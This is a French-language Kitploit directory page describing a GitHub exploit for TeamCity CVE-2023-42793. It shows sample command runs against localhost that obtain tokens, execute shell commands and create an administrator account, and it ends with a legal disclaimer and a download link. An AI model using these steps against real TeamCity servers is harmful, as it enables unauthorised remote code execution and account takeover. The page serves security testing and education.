Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-42793 — Exploit pour TeamCity CVE-2023-42793 permettant l'exécution de code à distance et la création de compte administrateur via un contournement d'authentification basée sur les jetons. | Kitploit
Outils/GitHubGitHub/cxdxnt/cve-2023-42793
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubcxdxnt/cve-2023-42793

CVE-2023-42793

Exploit pour TeamCity CVE-2023-42793 permettant l'exécution de code à distance et la création de compte administrateur via un contournement d'authentification basée sur les jetons.

Voir le dépôt
2il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-42793 - Créer un nom d'utilisateur administrateur

Exemple d'exécution de commande :

root@kitploit:~
python3 exploit.py -u http://localhost
User add token ->  eyJ0eXAiOiAiVENWMiJ9.YkZ0V2tzR3NvWXhZelRfZTN0cFF1SkZjVWVz.N2M0Njk2ZTgtNWZhYi00MTU5LWJmZjQtYWU1MDFlYzZiMGY1
Successful execution, preparing for the RCE
Command -> whoami
StdOut:tcuser

StdErr: 
Exit code: 0
Time: 16ms
Command -> ls -la /home
StdOut:total 8
drwxr-xr-x 2 root root 4096 Apr 15  2020 .
drwxr-xr-x 1 root root 4096 Feb 28  2024 ..

StdErr: 
Exit code: 0
Time: 23ms

En cas d'expiration du jeton, un nouveau sera créé automatiquement.

root@kitploit:~
Command -> whoami
[-] Token expired, restarting...
[!]Error deleting user
User add token ->  eyJ0eXAiOiAiVENWMiJ9.ZVJiSTB6SGZWSEpldzhEa1o4cUdsWFlQRTJJ.NGQxOTg4ZWItNTJmYS00OWM3LWIwYmItZjcyODNkYjg5NTJj
Successful execution, preparing for the RCE
Command -> whoami
StdOut:tcuser

StdErr: 
Exit code: 0
Time: 24ms

Créer un nom d'utilisateur administrateur :

root@kitploit:~
python3 user_add_administrator.py -t http://127.0.0.1 -u cxdxnt -p testing -u [email protected]
User add token ->  eyJ0eXAiOiAiVENWMiJ9.Z21xU3ZtTXNYUXE2WGdkaWJCOFV4QWsxN2s0.NmMyZDE0YTItMDQ1OS00NGQ2LTk2YWEtNjg1MTU3ZGNiNjM0
Create username administrator

En cas d'utilisateur existant :

root@kitploit:~
python3 user_add.py -t http://127.0.0.1 -u cxdxnt -p testing -u [email protected]
User add token ->  eyJ0eXAiOiAiVENWMiJ9.Q3ZFa0ExR2tBcGlSMUZ3ZWNyMUtNN0VPQmFN.Mzk0M2EyZjAtMzVhNi00YTU0LWFmNTctMTg4MThkZmU5MDA3
is already in use by some other user.

Avertissement légal

Ce dépôt est destiné uniquement à des fins éducatives et de recherche en sécurité informatique. L'utilisation des scripts et techniques décrits ici pour compromettre des systèmes sans autorisation est illégale et viole les lois nationales et internationales, telles que la Loi 26.388 (Argentine), la CFAA (États-Unis) et la Convention de Budapest.

L'auteur n'est pas responsable de l'utilisation abusive des informations fournies ici. L'utilisation de ce matériel est autorisée uniquement dans des environnements contrôlés, des laboratoires, des CTF, ou avec l'autorisation explicite du propriétaire du système.

Si vous allez effectuer des tests, assurez-vous d'avoir la permission. Pirater sans autorisation n'est pas du hacking éthique ; c'est un crime.

Télécharger l’outil